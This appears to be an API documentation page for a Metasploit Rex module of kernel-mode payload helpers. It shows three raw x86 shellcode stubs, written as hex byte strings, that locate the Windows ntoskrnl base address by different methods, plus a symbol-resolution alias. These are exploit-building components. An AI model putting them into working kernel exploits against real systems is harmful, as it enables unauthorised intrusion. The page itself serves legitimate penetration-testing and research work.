Module: Rex::Payloads::Win32::Kernel::Common
- Defined in:
- lib/rex/payloads/win32/kernel/common.rb
Overview
This class provides common methods that may be shared across more than one kernel-mode payload. Many of these are from the following paper:
Class Method Summary collapse
-
.find_nt_idt_eeye ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax.
-
.find_nt_kdversionblock ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax.
-
.find_nt_pcr ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax.
-
.resolve_call_sym ⇒ Object
Alias for resolving symbols.
Class Method Details
.find_nt_idt_eeye ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax. This method works by using an IDT entry. Credit to eEye.
22 23 24 |
# File 'lib/rex/payloads/win32/kernel/common.rb', line 22 def self.find_nt_idt_eeye "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7" end |
.find_nt_kdversionblock ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax. This method uses a pointer found in KdVersionBlock.
30 31 32 |
# File 'lib/rex/payloads/win32/kernel/common.rb', line 30 def self.find_nt_kdversionblock "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10" end |
.find_nt_pcr ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax. This method uses a pointer found in the processor control region as a starting point.
39 40 41 |
# File 'lib/rex/payloads/win32/kernel/common.rb', line 39 def self.find_nt_pcr "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4" end |
.resolve_call_sym ⇒ Object
Alias for resolving symbols.
46 47 48 |
# File 'lib/rex/payloads/win32/kernel/common.rb', line 46 def self.resolve_call_sym Rex::Payloads::Win32::Common.resolve_call_sym end |